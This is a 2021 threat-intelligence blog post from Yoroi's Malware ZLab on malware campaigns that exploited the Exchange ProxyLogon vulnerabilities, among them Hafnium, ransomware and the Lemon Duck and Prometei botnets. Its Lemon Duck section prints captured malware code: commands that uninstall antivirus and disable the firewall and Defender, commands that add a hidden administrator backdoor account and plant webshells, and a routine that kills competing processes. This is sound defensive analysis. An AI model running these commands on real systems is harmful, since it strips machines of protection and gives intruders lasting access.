
A Lesson Learned from the Exchange Attack Waves
05/18/2021
Introduction
During the last months, a huge interest from security researchers was directed to Microsoft Exchange Server, one of the most adopted email technologies worldwide. In fact, starting from March 2021, when the ProxyLogon vulnerability has been publicly disclosed, we identified and kept track of many opportunistic attacks hitting this kind of services and we noticed that in some way Exchange services have been targeted by attacks both in APT and cyber-crime all the same.
ProxyLogon is the common name for the vulnerability identified with CVE-2021-26855. It allows a remote attacker to bypass the authentication and impersonate the administrator. Chaining this vulnerability with CVE-2021-27065 a remote attacker can obtain remote code execution on the target system.
Not only, during the very first days of May another Proof-of-Concept exploit has also been publicly released, as we reported in our public security bulletin N010521. That vulnerability belongs to a series of other ones discovered by NSA and fixed with the April Patch Tuesday Update.
Considering this context, we at Yoroi Malware ZLab decided to use this timeline as a particularly representative case study of how strong the connection between an unpatched Exchange flaw and the malware threat risk is, connecting the dots to provide a more exhaustive view of how cyber-security events like the Exchange vulnerability could shape the overall company security.
The Timeline
In order to provide a better overview of the cybersecurity landscape linked to this threat, we synthetized the events in the following infographics. As stated, we tried to keep track of the most relevant events belonging to threat research on that affected technology.
The following sections will provide a summary of the threats and the risks behind such kind of flaws.

The Exchange Vulnerabilities
The vulnerabilities are known as CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065.
The vulnerabilities are caused by many flaws in the handling of user requests in OWA components, exposed on ports 443, which can allow an unauthenticated remote attacker to compromise the mail server. In detail, the flaws are chained to be exploited in order to execute arbitrary code with privileged permissions on the target Exchange services. In detail:
- CVE-2021-26855: Server-Side Request Forgery (SSRF) type flaw which allows a remote attacker to gain the authentication at service level, through the creation of ad hoc HTTP / HTTPS requests.
- CVE-2021-26857: flaw in the internal "Unified Message Services" component of Exchange Server, allows the attacker to execute code with maximum privileges on the victim machine.
- CVE-2021-26858 and CVE-2021-27065: arbitrary files write flaw on the machine where the Exchange service is deployed, allowing an unauthenticated attacker to write every type of file (i.e., backdoors, RATs, Webshells etc.).
Chaining these vulnerabilities, a remote attacker can fully compromise the target server where Exchange is deployed. Besides them, other vulnerabilities have been discovered by NSA and published last month during the Patch Tuesday recurrent update. During the first days of May a Proof-of-concept code for CVE-2021-28482 vulnerability was publicly released on GitHub platform, increasing the attack risk. However, nowadays, there is no proof that this one has been exploited.

Figure: Snippet of the exploit code
The Zero-Day Phase
Hafnium
The cyber security firms who identified the actor who leverages those vulnerabilities dubbed it HAFNIUM (TH-270). The first spotted attacks were specifically targeting US-based companies and entities, but more accurate analysis and investigations revealed that there is global impact and victims are located worldwide.
After compromising the victim machines, the classic post-exploitation operations performed by the APT threat actor comprehend the implant on them a series of webshells to easily maintain the access and make Command and Control operations. Privilege Escalation and lateral movements through primarily using the "procdump" utility and dumping the "lsass.exe" process, the responsible of the storage of the password hashes in the Microsoft ecosystem. Other recurrent utilities adopted by the group include "7zip" in order to compress the data to be exfiltrated. Other "off-the-shelf" utilities ready-to-use for reverse shells are "Invoke-PowerShellTcpOneLine" of Nishang and Powercat.
These simple tools allow the attackers to completely compromise the Exchange server with a high possibility of performing lateral movements and complete intrusions inside the internal network, keeping undercovered for a long time, as we learned from the SolarWinds attacks.

The 1-Day Phase
Ransomware Operations
Other disruptive malware operations came from the Ransomware operations. Double Extorsion criminal groups found a great opportunity by those critical vulnerabilities in order to penetrate inside the company perimeter and release the malware. Below we'll mention the three major ransomware attacks which leveraged Exchange flaws.
Revil/Sodinokibi
Exchange vulnerability gave also to it the possibility of enlarge they criminal affairs. The most relevant attack of REvil gang is against the famous multinational hardware manufacturer Acer, which, last month has been hit by that ransomware.
REvil, aka Sodinokibi and internally tracked as TH-200, group is one of the most active and powerful Double Extortion criminal groups. The gang was able to leverage the ProxyLogon flaws and exfiltrate a large number of private documents before encrypting them.
If a big tech company such Acer can suffer of a not perfect vulnerability management program, every other Small-Medium company must learn the lesson and make an effort to enforce the internal cybersecurity process.

DearCry
DearCry (TH-289) ransomware is one of the first attempts of cyber criminals to monetize thanks to the diffusion of the ProxyLogon vulnerabilities. According to all the security firms, this threat has written with the purpose of make illegal revenues from the hype generated by the flaws.
The encryption routine of DearCry Ransomware is composed of two principal steps: the first one is to decode a hardcoded symmetric key through an RSA public key, also embedded inside the code; the second one is to use that AES key to encrypt user data through the OpenSSL library. This ransomware doesn't communicate with internet, so there is no data exfiltration.
In the end, we can say that the code seems to be written quickly, without cure of details. Its distribution is quite limited to few countries in the world.

Black Kingdom
Another example of highly opportunistic attack leveraging Exchange vulnerabilities is Black Kingdom ransomware (TH-290). Even this one is not much sophisticated, but the purpose is to monetize as soon as possible with the occasion provided by the Exchange vulnerability.
The infection starts with the installation of a webshell in the same way we described in the Hafnium section, then a malicious Powershell script is executed, and it drops a second stage payload, an executable written in python and packed with the PyInstaller utility, which allows the attackers to compile the python source code into a self-contained executable PE file. At this point, the malware creates the encryption key and the infection identifier, which will be sent to the Mega Hosting provider. Finally, thel encryption algorithm is AES-256 CBC.

Botnets
Another malware family largely adapt to leverage that serious vulnerability category is botnets. They can automate part of the TTPs of the attackers and at the same time they provide also a scale up for many malicious activities, i.e. crypto mining, or coordinated DDoS attacks etc.
In this context, we isolated two principal botnets, Lemon Duck and Prometei, which leverage the Exchange flaws to carry-on their malicious projects.
Lemon Duck
Lemon Duck (internally tracked as TH-127) is a complex and modular fileless malware known in the Threat Intelligence Research community from 2018. During the past year, it reached the first peak of distribution thanks to the different delivery methods, and, obviously, one of the favorite trends was a phishing mail abusing the COVID-19 pandemic trend, and this year expanded the compromission capabilities to 0-day and 1-day exploits.
During our CSDC operations, we intercepted on the machine of one of our customers a suspect connection to " t.netcatkit[.]com" a domain reported by Microsoft's Threat Research team to be connected to Lemon Duck. So, we started our threat analysis from that domain till to reconstruct the infection chain.
Below, we'll show some interesting features of that malware we isolated:
- Inside one of the many scripts of the modular malware, there is an interesting routine aimed at disabling most of the network and endpoint security solutions through the sage of WMIC, NETSH, Task scheduler, Services, Registry of Microsoft Windows environment:
cmd /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmd /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
cmd /c netsh advfirewall set allprofiles state off
cmd /c netsh advfirewall firewall delete rule 360????????
cmd /c netsh advfirewall firewall delete rule LiveUpdate360
cmd /c netsh advfirewall firewall delete rule 360LeakFixer.exe
cmd /c netsh advfirewall firewall delete rule 360????
cmd /c netsh advfirewall firewall delete rule 360bdoctor.exe
cmd /c netsh advfirewall firewall delete rule 360netcfg.exe
cmd /c netsh advfirewall firewall delete rule 360Seclogon
cmd /c netsh advfirewall firewall delete rule 360rp.exe
cmd /c netsh advfirewall firewall delete rule 360rps.exe
cmd /c netsh advfirewall firewall delete rule 360safe.exe
cmd /c netsh advfirewall firewall delete rule 360safe_cq.exe
cmd /c netsh advfirewall firewall delete rule 360EvtMgr.exe
cmd /c netsh advfirewall firewall delete rule 360se.exe
cmd /c netsh advfirewall firewall delete rule 360????-????
cmd /c netsh advfirewall firewall delete rule 360sdUpd.exe
cmd /c netsh advfirewall firewall delete rule 360????
cmd /c netsh advfirewall firewall delete rule 360????-??
cmd /c netsh advfirewall firewall delete rule 360sd.exe
cmd /c netsh advfirewall firewall delete rule 360speedld.exe
cmd /c netsh advfirewall firewall delete rule 360Tray.exe
cmd /c taskkill /im 360bdoctor.exe /F
cmd /c taskkill /im 360rp.exe /F
cmd /c taskkill /im 360rps.exe /F
cmd /c taskkill /im 360safe_cq.exe /F
cmd /c taskkill /im 360safe_se.exe /F
cmd /c taskkill /im 360sd.exe /F
cmd /c taskkill /im 360speedld.exe /F
cmd /c taskkill /im 360Tray.exe /F
cmd /c taskkill /im 360LogCenter.exe /F
cmd /c taskkill /im 360tray.exe /F
cmd /c taskkill /im 360speedld.exe /F
cmd /c taskkill /im 360se.exe /F
cmd /c stop SecurityHealthService
cmd /c stop wuauserv
cmd /c stop WaaSMedicSvc
cmd /c stop WerSvc
cmd /c stop mpssvc
cmd /c stop Sense
cmd /c stop WdNisSvc
cmd /c stop WinDefend
cmd /c stop uhssvc
cmd /c REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Code snippet 1: Disabling security mechanisms
- The backdooring procedure is guaranteed bytwo different methods:
- adding a new used named "netcat" among the LOCALGROUP with the administrative privileges;
- Installing specific webshells inside the public webserver.
cmd /c net user 'netcat qweqwe$123123' /add
cmd /c net LOCALGROUP administrators netcat /addcmd /c net LOCALGROUP 'Remote Desktop Users' netcat /addcmd /c net LOCALGROUP 'Enterprise Admins' netcat /add
cmd /c net user netcat /ACTIVE:YES
cmd /c md "C:\inetpub\wwwroot\aspnet_client\js\demo"
copy "C:\inetpub\wwwroot\aspnet_client\wanlin.aspx" "C:\inetpub\wwwroot\aspnet_client\js\demo\wanlins.aspx"copy "C:\inetpub\wwwroot\aspnet_client\wanlin.txt" "C:\inetpub\wwwroot\aspnet_client\js\demo\wanlin.txt"
cmd /c attrib +a +s +r +h "C:\inetpub\wwwroot\aspnet_client\js"
cmd /c attrib +a +s +r +h "C:\inetpub\wwwroot\aspnet_client\js\*"
cmd /c attrib +a +s +r +h "C:\inetpub\wwwroot\aspnet_client\js\demo"
cmd /c attrib +a +s +r +h "C:\inetpub\wwwroot\aspnet_client\js\demo\*"
Code Snippet 2: Backdooring capabilities through adding local user and webshells
- Another interesting procedure is to eliminate the concurrence. In fact, if another Crypto Miner or RAT malware is running, it immediately stops that process.
Function Killer {
$SrvName = "xWinWpdSrv", "SVSHost", "Microsoft Telemetry", "lsass", "Microsoft", "system", "Oracleupdate", "CLR", "sysmgt", "\gm", "WmdnPnSN", "Sougoudl","National", "Nationaaal", "Natimmonal", "Nationaloll", "Nationalmll","Nationalaie","Nationalwpi","WinHelp32","WinHelp64", "Samserver", "RpcEptManger", "NetMsmqActiv Media NVIDIA", "Sncryption Media Playeq","SxS","WinSvc","mssecsvc2.1","mssecsvc2.0","Windows_Update","Windows Managers","SvcNlauser","WinVaultSvc","Xtfy","Xtfya","Xtfyxxx","360rTys","IPSECS","MpeSvc","SRDSL","WifiService","ALGM","wmiApSrvs","wmiApServs","taskmgr1","WebServers","ExpressVNService","WWW.DDOS.CN.COM","WinHelpSvcs","aspnet_staters","clr_optimization","AxInstSV","Zational","DNS Server","Serhiez","SuperProServer",".Net CLR","WissssssnHelp32","WinHasdadelp32","WinHasdelp32","ClipBooks"
foreach($Srv in $SrvName) {
$Null = SC.exe Config $Srv Start= Disabled
$Null = SC.exe Stop $Srv
$Null = SC.exe Delete $Srv
$TaskName = "my1","Mysa", "Mysa1", "Mysa2", "Mysa3", "ok", "Oracle Java", "Oracle Java Update", "Microsoft Telemetry", "Spooler SubSystem Service","Oracle Products Reporter", "Update service for products", "gm", "ngm","Sorry","Windows_Update","Update_windows","WindowsUpdate1","WindowsUpdate2","WindowsUpdate3","AdobeFlashPlayer","FlashPlayer1","FlashPlayer2","FlashPlayer3","IIS","WindowsLogTasks","System Log Security Check","Update","Update1","Update2","Update3","Update4","DNS","SYSTEM","DNS2","SYSTEMa","skycmd","Miscfost","Netframework","Flash","RavTask","GooglePingConfigs","HomeGroupProvider","MiscfostNsi","WwANsvc","Bluetooths","Ddrivers","DnsScan","WebServers","Credentials","TablteInputout","werclpsyport","HispDemorn","LimeRAT-Admin","DnsCore","Update service for Windows Service","DnsCore","ECDnsCore"
foreach ($Task in $TaskName) {
SchTasks.exe /Delete /TN $Task /F 2> $Null
$Miner = "SC","WerMgr","WerFault","DW20","msinfo", "XMR*","xmrig*", "minerd", "MinerGate", "Carbon", "yamm1", "upgeade", "auto-upgeade", "svshost",
"SystemIIS", "SystemIISSec", 'WindowsUpdater*', "WindowsDefender*", "update",
"carss", "service", "csrsc", "cara", "javaupd", "gxdrv", "lsmosee", "secuams", "SQLEXPRESS_X64_86", "Calligrap", "Sqlceqp", "Setting", "Uninsta", "conhoste","Setring","Galligrp","Imaging","taskegr","Terms.EXE","360","8866","9966","9696","9797","svchosti","SearchIndex","Avira","cohernece","win","SQLforwin","xig*","taskmgr1","Workstation","ress","explores"
foreach ($m in $Miner) {
Get-Process -Name $m -ErrorAction SilentlyContinue | Stop-Process -Force
$tm = Get-Process -Name TaskMgr -ErrorAction SilentlyContinue
Code Snippet 3: Routine to kill miners competitor and other RATs
- Finally, the last evidence to highlight is the contacting routine of the mining serves:

Code Snippet 4: Evidence of mining domains

Prometei botnet
Prometei (TH-291) botnet has been disclosed past year and it is a crypto mining malware with a modular design. It adopts also a complex and various methods to propagate inside the internal network, for instance through the usage of SMBGhost and EternalBlue exploits. The botnet comprehends at least a dozen of different executable module, all directly downloaded from the principal C2 over the HTTP protocol.
The latest reported campaign of Prometei botnet provides a series of enhancements on the resilience of C2 infrastructure: in particular, it can communicate with four different C2, making harder the take-down of all the malicious infrastructure.
The mail malicious TTPs of this threat cover three macro areas:
- Spreaders inside the internal network, through the exploit the vulnerabilities of the principal application-level protocols, like SMB, SSH and RDP. Those exploits are supported by other classic privilege escalation and credential grabbing tools, such as Mimikatz and ProcDump.
- Backdoors provided by the main modules installed after the compromise of the machine through the ProxyLogon vulnerabilities.
- Mining of Monero Cryptocurrency: it is the monetizing objective of all the infection chain.

Conclusion
Looking at what happened with recent Exchange vulnerabilities is fundamental to understand the dynamics behind the Technical Vulnerability risk. Being subject to vulnerability exposure window on critical services and technologies is literally like throwing away your car keys in the park and hoping nobody will use them. It is ok in an ideal world, but what we can learn from the Exchange flaws dynamics is much different: a lot of malicious actors are actually sweeping around the neighborhood, actively looking to any kind of opportunity to get your assets and profit. Totally a different risk scenario.
Serious malware attacks do not only rely on users opening malicious emails and link, vulnerability exposure window is at least equally dangerous and is becoming one of the major infection vectors.
What happened with the recent Exchange flaws is just an example of how incredibly important is to continuously monitor Malware Threats and Vulnerabilities lifecycle, implementing a well-formed cyber security strategy must include take into account how to formulate Cyber Threat Intelligence requirements and to leverage information sources in order proactively anticipate and avoid this kind of risks.
This blog post was authored by Luigi Martire and Luca Mella of Yoroi's Malware ZLAB